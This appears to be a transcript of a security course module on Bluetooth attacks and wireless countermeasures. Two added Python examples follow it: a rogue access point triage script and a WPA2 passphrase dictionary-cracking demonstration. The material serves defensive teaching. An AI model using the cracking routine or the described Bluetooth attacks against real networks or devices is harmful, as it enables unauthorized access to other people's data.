went through and took a look at wireless traffic analysis, doing things like reconnaissance, looking for
vulnerabilities on the wireless network, and using our cool tools such as Wireshark or OmniPeak. We
also stopped for a second and talked about wireless network cards. Not all of them are created
equally, and some of them will give you more features as far as wireless hacking is concerned, while
others will just limit you altogether. We then got into taking a look at launching the attacks using
Aircrack-ng and its suite of utilities, finding hidden SSIDs. And then after finding the networks, we went
in and cracked the Wi-Fi encryption. Again, several different products can be used to accomplish this,
whether it's KisMAC, Aircrack-ng, Cain & Abel, or even Reaver. And of course we took a look at how
we could do that with Reaver as well as Aircrack-ng. "Gee, Dale, that's really cool. "Is that all the
wireless we need to worry about?" No, there's one more medium that we can use, or that we have to
be careful about. And I'll give you a hint. ♫ I feel blue ♫ I will give up my day job.

Hacking Bluetooth

Hacking Bluetooth

So, Bluetooth isn't normally something we would consider an attack vector, but it really is. It's a
technology that allows for devices to share data over somewhat short distances. So don't get down in
the dumps. I don't want you feeling like, oh yeah, I got to do a quote, right? And who knew that I could
throw in Big Bird along with hacking? But if you haven't seen that movie, Big Bird actually sings the
song "I'm So Blue". In fact, if you don't shed a tear while watching that scene, you're heartless. Well,
in this module, we're going to go through and take a look at the different methods to the madness of
hacking Bluetooth. We'll go through and take a look at the threats that Bluetooth provides, or creates,
I should say. Then we'll make sure you understand some of the new terms that are going to be
presented to you. Oh, I can't wait for this one. Then we'll also make sure you understand how
Bluetooth, at a very high level, works. And, of course, we'll look at its security mechanisms. And then,
of course, it can't be complete unless we talk about tools and attacking. So cheer up, and let's get
going.

The Threats

"So, Dale, is Bluetooth really a threat?" Well, let's think about it for a second, folks. What devices do
you have that have Bluetooth in them? Uh-huh. And what are you storing on those devices? Maybe
calendars, contacts, birthdays? I've got a family member that's created a contact called "passwords",
and guess what she lists there? Oops, did I say "she"? You know, these devices are subject to the
same type of things we see with other wireless communication, such as any type of malicious code. In
fact, I might be able to gain remote access, and then obviously get a hold of that
information. Sometimes with or without your knowledge. Other times, I may use social engineering. In
fact, this is the big thing going on right now, is that attackers are tricking Bluetooth users to lower the
security, or even disabling authentication for Bluetooth connections so they can pair them up and
steal the information off of them. Now, it's even worse when you think about that remote
access concept, because with it I could remotely control the device. I could have your device make a
phone call to a 1-900 number, or use some type of service that charges money to your account. As we
mentioned, mobile phones and worms are all over the place, and we can transmit those via
Bluetooth. And then have it replicate itself via Bluetooth. I could use your phone to send out SMS
messages. If I really want to have fun with you, and you get charged per SMS message, I can rack up
quite the phone bill for you. In fact, I could turn on debugging, and activate it so that I could record
your phone conversations and forward them to me. All in all, if you want to sum this up, anything that
you store in these type of devices will be mine! Insert evil laugh here.

New Terms

Now I know by now your little brains are probably overloaded with tons of acronyms and terms, but
you're going to have to make some room for some new ones, especially when it comes to
Bluetooth. Let's first talk about something called BlueJacking. BlueJacking is basically sending
messages via Bluetooth from one device to another, without the consent of the user. Kind of like
spam. You know, it's relatively harmless. The attacker can't actually access any information, or
intercept messages, but he can use BlueJacking as a way of social engineering a target to do something
on the phone, because a message told him to do it, thinking that it's an official thing. Like, "turn on
your wi-fi and hook into this access point". Plus, it's just really annoying getting a ton of BlueJack
messages. Another term is referred to as, yep, (lips smacking and kissing) BlueSmacking! That's from
me to you. (laughter) This is actually a denial of service attack that causes a buffer overflow. And it
does it basically through a ping of death, through ICMP packets being sent to the Bluetooth
device. Here's another one, I always laugh at this one too. It's called BlueSnarfing, and you may be
wondering what this picture has to do with anything. Back when I was a young father, there was a TV
series on that I used to watch with my daughter. It was called Thundercats and the comedic relief for
the Thundercats was this creature called Snarf, and he'd go "Snarf Snarf". So anytime I hear
BlueSnarfing I always laugh. And no, that's not me dressed up for a cosplay. Now, BlueSnarfing is much
worse than BlueJacking, because it does allow the attacker to get in to some of your information. With
this type of an attack, the attacker uses a special software to request information from the device via
Bluetooth Push Profile. And the attack can be carried out against the device in invisible mode, but this
is less likely due to the time needed to figure out the device's name through guessing. Another term
that you need to be familiar with is something called BluePrinting. Can you guess what it does? Hang
on, I know what you're thinking. It has something to do with printers, right? No, BluePrinting is simply
a footprinting method. Aah, now you see the correlation between BluePrinting and footprinting,
huh? Well, this method allows the attacker to find out the model and make of the device that they're
going after. Another term that we use is called BlueBugging. Now, BlueBugging is when the attacker
is able to gain remote access to the target Bluetooth-enabled device, without the victim being aware
of it. And it gives them full access to the AT level commands of the device, which means they would
have read/write access to text messages and their phonebook, or contacts. Now BlueBugging was
actually developed after the onset of BlueJacking and BlueSnarfing. It's just on steroids. Now, outside
of "Blue" we still have access, or the ability to make use of, other technologies or attack vectors that
we've talked about already. One being the famous man-in-the-middle impersonation attack. During
this attack, the device intended to pair with each other unknowingly pair with the attacker's
device. And therefore acts as a man-in-the-middle. We also have the famous MAC spoofing. We all
know what this is, right? This is a passive attack, where the attacker spoofs the MAC address of the
targeted Bluetooth-enabled device, in order to intercept the data being sent to the targeted
device. Now, that wasn't so bad, right? Now, a couple of these terms you're going to want to make
sure you're very much aware of for your immediate future. In particular BlueSmacking, BlueJacking,
and BlueSnarfing.

All About Bluetooth

So, let's talk about Bluetooth. Isn't that an interesting name, Bluetooth? So, Bluetooth was actually
created by Ericsson, a famous telecommunication company, and they have a Swedish
background. When they were coming up with a name for it, the Scandinavian creators recalled a
legend of a Danish Viking king, King Harald Blatand. I think that's how you pronounce it, I'm not
Swedish. But, according to legend, he had an uncanny ability to bring people together in non-violent
negotiations. And his name translated to English is, you guessed it, Bluetooth. And Bluetooth got its
start, really, back in 1989 when it was first created. But it didn't really catch on, or there weren't a
lot of devices that supported it. It was actually designed to be a replacement for cabling. It was
designed to be low-powered. In fact, its original name was called "short link radio technology". And
when we say low power, we're not really talking about distance, we're talking about consumption of
energy. Developers are actually able to create smaller sensors that run off those tiny coin cell batteries
for months. But again, it is designed for short distances. Originally, we got about 10 meters out of
it. Well, kind of. The newest implementation of Bluetooth, Bluetooth I, can get up to 100 meters. Now,
when it comes to how Bluetooth actually operates, it goes through a pairing process. When you pair
up a device, say for example your phone to your vehicle, or your phone to your headset, during that
pairing process some information is transmitted: One, the name of the device. It also includes the class
of the device. Is it an audio device, a mic, a display? As well as the services. For example, I have a
Bluetooth speaker, that when I hook into it via my phone, the speaker itself can also answer calls
because the services that it supports is not only audio, but recording. There's also some technical
information that's transferred back and forth, including the Bluetooth MAC address, as well as the
pre-shared secret. Oh, no, the pre-shared secret. Yeah, that's the dilemma, because when the two
devices pair up, they exchange this pre-shared secret, or link key, and each stores this link key to
identify each other for future pairing. So the next time I turn on my phone with my speaker, it
automatically hooks back up. Do you see where we're going with this one? Now as far as the frequency
that's utilized, it's the standard 2.4 GHz frequency using frequency-hopping spread spectrum. And it
hops around the channels at about 16,000 per second, which is kind of a security mechanism
itself. But, trust me, I've got utilities out there that will help me find Bluetooth devices. Now, besides
using frequency-hopping as a security mechanism, again remember both the master and slave have
to know the hop sequence. We also have the pre-shared key that's exchanged at pairing. But then
there's also three different modes. The first mode is Discoverable mode. This is the mode we are
probably all used to. When you try to pair up a device, you make it discoverable, which means it will
respond to any inquiries that are made to that device.Now, this mode should only be turned on while
making the connection for the first time. Upon saving the connection, the two devices will
remember each other, and therefore the Discoverable mode isn't necessary at a later point. We also
have something called Limited mode. Limited mode is exactly what it sounds like, it's only responding
for a limited time. Most of our phones today when we make them discoverable, have a timeout, at
least my phone I think has two minutes before it becomes non-discoverable. Whoops, I just gave away
the third one. Yep, Non-discoverable mode basically means that it prevents the device from appearing
on anybody's lists of available Bluetooth devices in the area. However, it's still available, or visible, to
those devices that it's paired with previously. Now, there are two pairing modes that are available as
well. The first one is referred to as Non-pairing, and just like the name sounds, the device itself rejects
any pairing requests made by any device. Versus Pairable, oh I'm sure I've got a story there, I should
say Pairing mode, the device accepts a pairing request upon receiving and establishing the
connection with the pairing requested device. So it's a two step process. First, we have to be
discoverable, and then we have to have a pairing mode.

Security

Now, when it comes to Bluetooth, security is a big issue for us. And the reason why security's such an
issue is because of what Bluetooth isn't. First of all, Bluetooth itself is not secure. Not only in its
implementation, but there's actually some very serious flaws in the design itself, because again,
technically it's being used for something today that it wasn't designed to be used for. I'll touch on that
here in just a second. Also, everyone has this concept that Bluetooth is short range. Again, this is
changing up with different classes. Class I Bluetooth devices have a range of up to 100 meters. So, just
because I'm a little bit further away from you, doesn't mean that you're safer from me. And also the
aspect that, let's face it, even though Bluetooth is old, it hasn't grown up yet as far as the
communication method is concerned. Or, I should say, as far as communicating securely is
concerned. With smartphones, it has turned into something totally different than what it was meant
to be. It was created as a way to connect phones to just simply peripherals. Now, Bluetooth does so
much more than that, and no one has taken a look at the underlying security mechanisms of it. But
it's becoming such a standard de facto now, that everybody leaves it on. I'll be honest with you, I've
got a smart watch that has a Bluetooth connected to my phone all the time. So what does that tell you
as far as Bluetooth around me is concerned when I'm traveling? Yeah, guess what, I turn it off when I
travel. But when I'm at home, I leave it on, and I hope I remember to turn it off, but we're all
human. Because that connection is there, if I'm not careful, somebody, given enough time, could get
into my phone just by looking at the traffic between my watch and my phone. Just because I have my
watch on my hand and my phone in my pocket, doesn't mean the signal doesn't go beyond my pocket
and my wrist. It's broadcasting outward in a 360 degree area. So, the question then is, what's our
vector, Victor, as far as attacks are concerned? Well, our vectors are very easy. First of all, oh my gosh,
defaults, defaults, defaults. Hello, folks. And it's too frequent that individuals actually abandon proper
setup of systems and devices for the convenience of the "out of the box configuration". Some devices
have the Bluetooth radio turned on by default. Or their security mode is set to one, which is the lowest
security. We'll talk about those modes a little bit later. But just so that you understand, mode one says
no encryption is required, nor authentication. And do we need to talk about the default pass
keys? Hello, one-two-three-four, zero-zero-zero-zero, one-one-one-one, did I just guess it? Another
vector for us is going to be, obviously, theft and loss. Listen, our devices are getting smaller and more
powerful, which is really weird that such small devices are more powerful than systems we had years
ago. But greater portability means the potential for loss and theft. These devices that we now carry
with us can perform more functions and store more data than ever, and that matters if they get into
the hands of an attacker. This, however, makes
them a greater instrument, or target, for an attacker. Either physically by taking them, or by linking
into them. So, one of the convenient things about Bluetooth is that it remembers its passkey with
another Bluetooth device, so it re-syncs up the next time it comes into play, right? Well, guess
what? Typically, these keys are stored in non-volatile memory, which means that if I can get a hold of
the key on the phone I'm pretty sure it's the same key being used on all your devices that are
connected to that phone. So then we talk about eavesdropping and impersonation. Now, what we
mean by this is that we allow an attacker to intercept or listen in or onto communications between
two or more devices. Now, here's where the frequency-hopping comes into play. It makes it a little
more difficult for us to listen in since it is hopping around. But if I can figure out the frequency-hopping
algorithm that you're using, or the hop sequence, I can simply listen in. In fact, to just circumvent the
frequency-hopping algorithm, all I have to do is use another Bluetooth listening device that's modified
to listen to all frequencies. And I bet you'll guess that I've got a tool for that, right? It actually turns the
device into a sniffer for Bluetooth. The other vector that we need to be concerned about isreferred to
as a person-in-the-middle attack, or a PiTM attack. "Whoa, wait Dale. I thought it was man-in-the-
middle attack?" It's basically the same thing. It's, again, where the attacker, who already has the link
keys of the two Bluetooth devices, can intercept the communication and initiate new communications
to both devices, posing as each other. Via Bluetooth, there has to be a master and a slave. Typically
your phone would be the master, your headset would be the slave. And that actually creates what
they refer to as a piconet. "Oh, come on Dale, you're making things up now" Nope, that's what we call
it. It's an ad-hoc network. Well, by doing a person-in-the-middle attack, we actually end up creating
two piconets, since both devices are considered slaves and masters. And, of course, we all know about
DoSs, right? Denial of Services? Well, it is possible on Bluetooth systems, even though there hasn't
been a lot of documented cases on it. Obviously just like any Denial of Service attack, it results in the
device losing the ability to access other Bluetooth resources. Now, sometimes the Denial of Service
attacks are done without our knowledge, or without an attacker being nearby. "Uh, say what
Dale?" Well, that's because again, Bluetooth operates on 2.4 GHz, and there are some other devices
that are around your house that might interfere such as microwave ovens, cordless phones, or
anything else that may be on the 2.4 GHz frequency. And there's also another type of Denial of
Service. This one's kind of interesting. This is where the attacker attempts to exhaust the power on the
portable device, and they accomplish this by flooding the target device with requests for data
transfers. Or create a connection to the point where the target device is drained of power. Now, that
particular type of vector doesn't really compromise the security,but rather it's just annoying that
your battery drains quickly.

Summary

So, in this module we went through and took a look at Bluetooth. First we looked at the threats that it creates. Again, think of all the devices that we have out there that have Bluetooth enabled on them. Some of them we don't even realize, or maybe we're not even utilizing it. I just discovered last week that my soundbar for my home theater system has Bluetooth enabled on it. And we also talked about how this platform is actually overlooked quite a bit when it comes to security. So then we talked about different terms that you need to be aware of. We talked about BlueJacking, BlueSnarfing, "Snarf Snarf", see, you're going to think it now. BlueSmacking, as well as BluePrinting and BlueBugging. We then went through and talked a little bit about Bluetooth, what it was originally designed for. The different modes that it has. Not only the Discovery modes, but also the Pairing modes. And then we went through and took a look at the security of Bluetooth, or in some cases the lack thereof. Some of the security mechanisms are built in, like the frequency-hopping aspect. Some of them I'm not too crazy about. Then we went through and took a look at some of the cool tools, and some of the attacks that they could implement for us against Bluetooth devices. Now, by this point of all my courses you are all shivering in the corner, scared to look outside. Next, we're going to take a look at some countermeasures. Maybe one of those countermeasures is to turn on a hall light for you so you're not so scared.

Countermeasures

Okay, so now that we've talked about the big, scary wireless, let's talk about countermeasures. Now, we've discussed previously also why we need to have countermeasures, and I think the Dalai Lama sums it up the best. He said, "Forgiveness doesn't mean forget what happened. If something is serious and it is necessary to take countermeasures, you have to take countermeasures." Such a wise statement, huh? So in this module, we're going to go through and take a look at the different countermeasures that we can implement to help protect us when it comes to Bluetooth, as well as look at how to prevent rogue access points from hitting our network. We'll then go through and take a look at the 6 layers of wireless; it's like an onion, there's layers. (Laughs) And then we'll take a look at some of the best practices. And of course, any module wouldn't be complete unless we talked about some of the tools that can make our lives a little easier.

Bluetooth
So let's start off with countermeasures for Bluetooth. Eh, don't feel so sad, this is actually kind of easy. The first thing you want to do is some of the obvious things, like stop using default PINs like 1234 or 1111. Make sure that your Bluetooth devices are kept in non-discoverable mode. Hey, if you can't see it, you can't connect to it. Better yet, if you don't need it, turn it off. I only have my Bluetooth on when I feel like I'm in my safe zone, which is getting smaller and smaller all the time. Also, check your paired devices. Make sure there's nothing random all of a sudden showing up as a device that you've paired up with. And don't accept any unexpected requests. And if your device supports it, make sure that you implement link encryption on all connections. Now, there are also four different security modes that Bluetooth supports. Now, depending on the device and the developer, they can implement some security modes. There are four security modes for Bluetooth to access between two devices. Those modes are typically broken down by either level 1, or mode 1, which is little or no security; mode 2, which is service-level enforcement security, meaning that depending on what services we're going to use will determine the security that we implement. Mode 3 is link-level enforcement, or LLE, which means, for example, if I was communicating with my car I might want to have some security enforcement, but if I'm just talking to my speaker, I may not need it. And then there's also mode 4, which is LLE with encrypted key exchange. Now, the manufacturer of each product will determine the security modes, and technically there's a mode 5. That's where I find the device and crush it with my bare hands.

Rogue APs

Ah, rogue access points, one of my favorites. When it comes to countermeasures against these types of devices, what we want to do is obviously be a little proactive. One of the things we can implement is something called access point scanning. This is like controlling traffic, being aware of what's on the network or what's in the wireless world around you. It should be monitored 24/7. Now, a lot of the wireless intrusion prevention systems, or WIPS, out there support this capability. Some of them have some really cool features like being able to automatically block. And some of these WIPS have the ability to do things like block the switch port that the access point is connected to. That can also be done manually. You also might be able to kind of think outside the box. Use some of the features that these access points now come with, or how about even utilizing some things we've already learned, like a denial of service against the rogue access point. Yeah, turnaround's fair play, right? We can also implement something called RF scanning. Got any old access points lying around? Why not re-purpose those and deploy them throughout your network infrastructure? Most access points have the ability to detect new APs that are popping up and send notifications. Then there are wired-side inputs. This is basically a software solution, most of the time coming with your network management software products, that is able to detect access points that are rogue and then shut down their environment. These network management software programs are able to detect different devices via Telnet, SNMP, as well as, obviously, Cisco discovery protocols. You can also implement my favorite: open up a can of whoop-donkey. Yeah, I know, I wanted to use a different word there, but you get the idea, and what I mean by this is go and block the switch port. Or, I like to track it down with a vengeance. When you find a rogue access point, obviously, you want to pull it, and ask questions later. I don't care whose device it is. If it's on your network, you need to pull it. I also like to see if it'll take off like a Frisbee across the room, and if that doesn't work, one of my other defaults is to just simply accidentally drop it multiple times.
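Here is an added example of the access point scanning and wired-side correlation described above. It is not code from the course: the scan results, the authorized inventory and the switch MAC table are constructed sample data, and the way it guesses the switch port (looking for a wired MAC numerically adjacent to the rogue's BSSID) is a heuristic that many SOHO access points happen to satisfy, not something the page describes. Treat the port it names as a lead to verify before you block it.

```python
"""Rogue AP triage: RF scan vs. authorized inventory, then wired-side correlation.

Added example for this section, not code from the course. The scan results,
the inventory and the switch MAC table are constructed sample data. The
"wired MAC is adjacent to the BSSID" lookup is a heuristic many SOHO APs
happen to satisfy, not a guarantee; treat its output as a lead to verify.
"""
from dataclasses import dataclass

ONSITE_RSSI_DBM = -75   # assumption: anything louder than this is probably on premises


@dataclass(frozen=True)
class ScannedAP:
    bssid: str       # radio MAC seen in beacons
    ssid: str
    channel: int
    security: str    # "OPEN", "WEP" or "WPA2"
    rssi: int        # dBm as reported by the sensor


# Constructed: what a WIPS sensor or an `iw dev wlan0 scan` pass might report.
SCAN = [
    ScannedAP("00:11:22:33:44:10", "CorpNet", 6, "WPA2", -48),
    ScannedAP("00:11:22:33:44:20", "CorpNet", 11, "WPA2", -60),
    ScannedAP("de:ad:be:ef:00:01", "CorpNet", 1, "OPEN", -52),       # evil twin of CorpNet
    ScannedAP("aa:bb:cc:dd:ee:01", "linksys", 6, "WEP", -70),        # unmanaged desk AP
    ScannedAP("12:34:56:78:9a:bc", "NeighborWiFi", 3, "WPA2", -85),  # next building over
]

# Constructed inventory: authorized BSSID -> the SSID it is allowed to serve.
AUTHORIZED = {
    "00:11:22:33:44:10": "CorpNet",
    "00:11:22:33:44:20": "CorpNet",
}

# Constructed wired-side input: switch MAC address table, e.g. pulled via SNMP
# (BRIDGE-MIB dot1dTpFdbTable) or `show mac address-table`.
MAC_TABLE = {
    "de:ad:be:ef:00:00": ("sw-floor2", "Gi1/0/17"),
    "aa:bb:cc:dd:ee:00": ("sw-floor3", "Gi1/0/04"),
    "00:11:22:33:44:0f": ("sw-core", "Gi1/0/01"),
}


def mac_to_int(mac: str) -> int:
    return int(mac.replace(":", "").replace("-", ""), 16)


def classify(ap: ScannedAP, authorized: dict = AUTHORIZED) -> str:
    """Decide what kind of AP this is relative to the authorized inventory."""
    corp_ssids = set(authorized.values())
    if ap.bssid in authorized:
        # A known radio advertising the wrong network is itself a red flag.
        return "authorized" if authorized[ap.bssid] == ap.ssid else "authorized-bssid-wrong-ssid"
    if ap.ssid in corp_ssids:
        return "evil-twin"            # our SSID on a radio we do not own
    if ap.rssi >= ONSITE_RSSI_DBM:
        return "rogue-candidate"      # loud and unknown: probably in the building
    return "neighbor"                 # faint and unknown: leave it alone


def find_switch_port(bssid: str, mac_table: dict = MAC_TABLE, window: int = 8):
    """Heuristic wired-side lookup: return (switch, port) for the MAC-table entry
    closest to the BSSID, if one lies within `window` addresses of it."""
    target = mac_to_int(bssid)
    best = None
    for mac, location in mac_table.items():
        distance = abs(mac_to_int(mac) - target)
        if distance <= window and (best is None or distance < best[0]):
            best = (distance, location)
    return best[1] if best else None


def triage(scan=SCAN, authorized=AUTHORIZED, mac_table=MAC_TABLE):
    """Return one finding per AP that is not a properly behaving authorized AP."""
    findings = []
    for ap in scan:
        verdict = classify(ap, authorized)
        if verdict == "authorized":
            continue
        port = find_switch_port(ap.bssid, mac_table) if verdict != "neighbor" else None
        findings.append({
            "bssid": ap.bssid,
            "ssid": ap.ssid,
            "verdict": verdict,
            "weak_security": ap.security in ("OPEN", "WEP"),
            "switch_port": port,   # where to pull the plug, if the heuristic found it
        })
    return findings


if __name__ == "__main__":
    for finding in triage():
        print(finding)
```

Run as-is and it flags the evil twin on sw-floor2 Gi1/0/17 and the WEP desk AP on sw-floor3 Gi1/0/04, while the faint neighbor is reported but gets no port. In a real deployment the SCAN list comes from your sensors and MAC_TABLE from SNMP polling; the RSSI threshold and the MAC window are the two knobs you will have to tune for your building.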

6 Layers of Wireless

So let's take a look at the 6 layers of wireless security. Every time I hear 6 layers I always think of, yeah, the 6 layers of Kevin Bacon, and I'm sure that if I start with access points, within 6 layers I'll be able to get to Kevin Bacon. But instead, we'll actually talk about wireless security here. The first layer would obviously be wireless signals. In wireless networks, the continuous monitoring and managing of the RF spectrum within your environment helps to identify threats and makes you aware of its capabilities. You may want to invest in something like an IDS system, or even a wireless intrusion detection system, a WIDS. We've also talked about WIPS. When you start to see activities such as an increase in bandwidth usage or interference in the frequency, it might indicate a malicious intruder that is coming onto your network. Previously, I talked to you about how to limit the length of the transmission of your wireless by using a reflector of some sort. I've also heard of users removing antennas from access points. Just because the antenna isn't physically attached doesn't mean that the access point doesn't continue to operate; it just gives it a stronger signal. Well, if the signal is going too far, do yourself a favor. Try taking the antenna off, and then look at its transmission distance. Data protection is another layer within wireless security, and obviously we've talked about the use of WPA2 and AES. These encryption algorithms should help to protect your data during transmission. Again, it's not foolproof because of weaknesses in other subsystems. Another layer is device security: not only the physical layer of the device, but also making sure that the device is up to date via patch management and scanning these devices for vulnerabilities. And when I say scanning for vulnerabilities, I'm not necessarily saying hitting the device itself, but doing research to see if there are any vulnerabilities that have been listed by the manufacturer or third parties. Another layer would be connection security. Per-frame or per-packet authentication provides protection against man-in-the-middle attacks and makes them almost impossible to accomplish. It does not allow the attacker to sniff data when two authorized users are communicating with each other. I would also maybe take a look at centralizing that encryption method; obviously the centralization of this encryption, like a RADIUS server, requires additional security on the back end. Another layer would be network protection, meaning that strong authentication ensures that only authorized users are able to gain access to the network and its resources. When we say strong authentication, we're not only talking about the encryption on authentication mechanisms, we're talking about how long the passcodes or passphrases are. Weaknesses at that level make us extremely vulnerable. And finally, end users. Uh, say what, Dale? Yeah, believe it or not, if an attacker is able to associate with an access point, you ready for this? Personal firewalls. I know we hate them, especially when it comes to the Windows platform. Everybody has this tendency of disabling them, but these personal firewalls installed on the user's system on Wi-Fi networks prevent attackers from gaining access to files. And of course, "Firewall" was a movie with Harrison Ford, who was also in "6 Days and 7 Nights" with Bed Bode, who was in "Apollo 13", which obviously starred Kevin Bacon. See, I got there!

Best Practices

So, let's take a look at best practices, because typically this is where we have the most control as security professionals. And when I say best practices, I actually mean for the love of Pete, please. (Laughs) Let's first start with configuration. Well, when it comes to wireless, do yourself a favor and change the default SSID. In fact, this might be a great opportunity to practice something that I always talk about, and that is misdirection. For example, if I have a D-Link router, I know the default SSID is called D-Link. I'll switch to, oh I don't know, linksys or tsunami, a different manufacturer, because when an attacker is war driving through my neighborhood or through a business environment and he sees D-Link, he'll throw D-Link attacks or vulnerabilities at that device, which obviously won't work. Now, if you don't change the default username and password you deserve to be hacked, and yet so many people don't do this. I actually think it should be a standard feature when you do a setup of a new access point that it should tell you to change the default username and password. I was recently shocked with my new Netgear wireless access point: I can change the password but I can't change the username. Kind of discouraged there. Also, disable SSID broadcasting. Again, this isn't necessarily going to stop an attacker, but that's not your job, because that job is impossible. Your job is to slow them down. They have to be looking for hidden SSIDs. Also, disable remote login and wireless administration to the device. The last thing you want is the attacker to be able to gain access to the device wirelessly. Let's make it a little bit harder for them. Make it so that you have to be on the physical wired network to manage this device. Enable MAC filtering. Again, this is very similar to disabling the SSID broadcasting. It's not necessarily going to stop them, but it is going to slow them down. And in fact, if I slow him down enough, I'm going to hopefully discourage him. And do yourself a favor, I know this is a pain in the cahooskies, my family hates it, but change the passphrase often, or if you start to see some suspicious activity on the network or that device in its log files, definitely change it. I know, that means you have to go through and change all the passphrases on all your devices. But let's think about that one for a second. Is that really a pain, or is recovering from an attack a bigger pain?

Okay, so now that we're done with configuration best practices, let's talk about how we handle authentication best practices. Remember what I said about if you don't change the default username and password you deserve to be hacked? Well, that also applies if you're still using WEP. Now, granted, if that's your only choice because, I don't know, the device is so old, it's better than nothing. But if the device is that old, I honestly think it's time to upgrade. Make sure that you also update drivers on all the Wi-Fi devices. Again, I go back to this aspect that we're all so much aware of updating our applications, especially on our mobile devices, or we update our OSes. Famous Patch Tuesday, right, for Microsoft. But I always ask people, when is the last time you updated the firmware or the drivers on the Wi-Fi devices? This should be done at a minimum of at least once a year. I would preferably see this on a task list for yourself to be done every quarter. Now, we've talked also about creating the centralized authentication server. Remember our RADIUS server? And again, that's going to require some best practices as far as locking it down. And here's one you may not have thought of, but guess what? If you're not using it, turn it off, please! Just because you have the ability to be wireless doesn't mean you have to have it turned on. Now, because wireless is one of the attack vectors that an attacker can come in on, the other one obviously being the physical network, we need to make sure that we secure the physical site of the Wi-Fi devices, and that can take several different approaches. For example, access points: I try to hide them up inside of ceilings, especially if I have a drop ceiling. I don't want people to see that I have a Wi-Fi access point somewhere, or where they're located. Yeah, believe it or not, in pen testing, I'll actually go through and case the joint, which means I walk around and look to see if I can see any access points. That tells me right away if there's Wi-Fi available. Next time you're in a retail store, look around. I'm really shocked, especially in the big warehouse stores like Sam's Club, Costco, or Wal-Mart, you can see those bad boys everywhere.

So, now that we've done authentication, let's take a look at some best practices for the SSID settings. Now, we've mentioned already changing the SSID, or the default SSID, and also hiding it. This is also known as SSID cloaking. I once read an article out on the internet that had three reasons why hiding your wireless SSID was a bad idea. And one of the three options was hiding your wireless SSID tempts bad guys. Uh, guess what, you're already tempting them by the fact that you have a wireless network! Now, we can also argue whether it's a waste of time, because as we've seen, we can detect those, but that does require a different level of attacker. Also, when you name your SSID, oh please, bottom line, for the love of Pete, don't use anything identifiable like the company name, the address, your last name. At that point, you're just making things almost too easy. As far as the layout, you should also make sure that you place a firewall or a packet filter between the access point and the corporate network. That's almost a duh moment, right? Make sure that you check all the settings after updating the firmware on your devices. We talked previously about making sure that we update the devices themselves, or at least the firmware. Well, after you update them, all of your settings are typically saved, but new settings that the firmware offers are set to new defaults, so you need to review that information. I'm also a big fan of backing up your configurations, so in case you goof things up, you can always restore them. We also talked about limiting signal strengths. Speaking of removing antennas, which we talked about earlier, back in the old days, (old man voice) back when wireless was brand new, (regular voice) we actually had a D-Link. There was a famous D-Link router, and I can't remember what it is off the top of my head, but if you removed the antenna, you actually got a stronger signal. That's because the antenna they included was actually a governor, or a limitation; it was stifling the signal. Kind of funny, and I think that was back when 802.11b was the big bad boy on campus. And let's think about some other encryption technologies that we can use with wireless. Oh, for example, IPsec for wireless, or set up VPN tunnels between wireless users and access points. Anything, again, to slow our attacker down. Now, I do need to probably give you a caveat here, and that is every time we add additional protections to our systems, we do end up affecting performance as well as creating some complexity. And as you all know from my previous courses, any time we hear the word complexity, we have to associate with it the possibility of additional security holes being made. So, it takes a very vigilant IT security professional to keep up on all of this. But hey, that's what you're here for, right?
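An added example, not from the course, that shows why the default-SSID and passphrase advice above matters for WPA2-Personal: the Pairwise Master Key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so the SSID acts as the salt. An attacker who has precomputed a wordlist for "linksys" or "NETGEAR" once can reuse that table against every network with that name, while a non-default SSID forces a fresh PBKDF2 run per network, and a long random passphrase is not in any wordlist at all. The wordlist and the SSID names are constructed. Real cracking checks each candidate against the MIC in a captured four-way handshake rather than against a known PMK; the PMK stands in for that check here to keep the example short.

```python
"""WPA2-Personal: the SSID is the PBKDF2 salt, the passphrase is the secret.

Added example for this section, not code from the course. The wordlist below
is constructed, and a known PMK stands in for the real attacker's oracle
(checking candidate keys against a captured four-way handshake MIC).
"""
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # 256-bit Pairwise Master Key

# Constructed wordlist, the sort of thing a default-SSID rainbow table covers.
WORDLIST = ["letmein", "password1", "qwerty123", "iloveyou", "trustno1"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def known_vector_ok() -> bool:
    """Check against the IEEE 802.11i Annex H test vector ("password" / "IEEE")."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk("password", "IEEE").hex() == expected


def precompute_table(ssid: str, wordlist) -> dict:
    """What an attacker builds once per common SSID: PMK -> passphrase."""
    return {derive_pmk(word, ssid): word for word in wordlist}


def crack(target_pmk: bytes, ssid: str, wordlist, table=None):
    """Recover the passphrase behind target_pmk. With a table for this SSID the
    work is one dictionary lookup; without one it is a PBKDF2 run per word."""
    if table is not None:
        return table.get(target_pmk)
    for word in wordlist:
        if hmac.compare_digest(derive_pmk(word, ssid), target_pmk):
            return word
    return None


def demo() -> dict:
    """Same weak passphrase on a default SSID and on a renamed one."""
    linksys_table = precompute_table("linksys", WORDLIST)
    return {
        # Default SSID: the precomputed table cracks it with one lookup.
        "default_ssid": crack(derive_pmk("password1", "linksys"),
                              "linksys", WORDLIST, linksys_table),
        # Renamed SSID: the linksys table is useless against it...
        "renamed_ssid_with_old_table": crack(derive_pmk("password1", "grey-heron-42"),
                                             "linksys", WORDLIST, linksys_table),
        # ...so the attacker has to redo the PBKDF2 work for this one network.
        "renamed_ssid_fresh_run": crack(derive_pmk("password1", "grey-heron-42"),
                                        "grey-heron-42", WORDLIST),
        # A long random passphrase is in no wordlist, whatever the SSID.
        "strong_passphrase": crack(derive_pmk("c7Q!9vLp#2xZ-kW8rT4mN", "linksys"),
                                   "linksys", WORDLIST),
    }


if __name__ == "__main__":
    print("802.11i test vector OK:", known_vector_ok())
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The renamed SSID buys you one thing only: the attacker's precomputation no longer applies and every guess costs 4096 HMAC-SHA1 rounds against your network specifically. It does nothing for a passphrase that is in the wordlist, which is why the passphrase length advice above is the part that actually decides the outcome.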

Tools

